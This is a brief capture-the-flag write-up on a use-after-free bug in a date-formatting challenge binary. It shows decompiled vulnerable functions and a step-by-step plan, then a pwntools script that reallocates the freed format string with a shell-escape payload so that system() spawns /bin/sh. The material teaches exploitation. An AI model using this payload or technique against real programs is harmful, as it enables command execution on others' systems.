Time pls!


Ok this one was pretty simple it contained uaf bug .
The vuln code snippet ...

void set_foramt() { heap_ptr = strdup(str) qmemcpy(&accept, "%aAbBcCdDeFgGhHIjklmNnNpPrRsStTuUVwWxXyYzZ:-_/0^# ", 0x33uLL); if (strspn(s, &accept) == strlen(s)) { qword_602118 = heap_ptr; } } ... void set_zone() { heap_ptr = strdup(str) } void quit() { free(qword_602118) free(qword_602120) if( gets(s) == "Y") { exit(0) } } void print() { snprintf(&command, 2048LL, 1LL, 2048LL, "/bin/date -d @%d +'%s'", dword_602120); <------- ptr used after free :) system(&command) }

So to exploit it
1) call set_format which malloc's our input and copies str with 'DUMMY'
2) now free the memory using quit and giving 'N' to avoid exiting
3) now use set_zone to allocate in our payload in same mem as format str
4) now call print to exeute command and we use shell escape and get the shell :)

from pwn import * p = process("unix") log.info(p.recvuntil('>')) p.sendline("1") log.info(p.recvuntil(':')) p.sendline("AAAA") log.info(p.recvuntil('>')) p.sendline("5") log.info(p.recvuntil('?')) p.sendline("N") log.info(p.recvuntil('>')) p.sendline("3") log.info(p.recvuntil(':')) payload = "'&& /bin/sh ;'" p.sendline(payload) log.info(p.recvuntil('>')) p.sendline("4") p.interactive()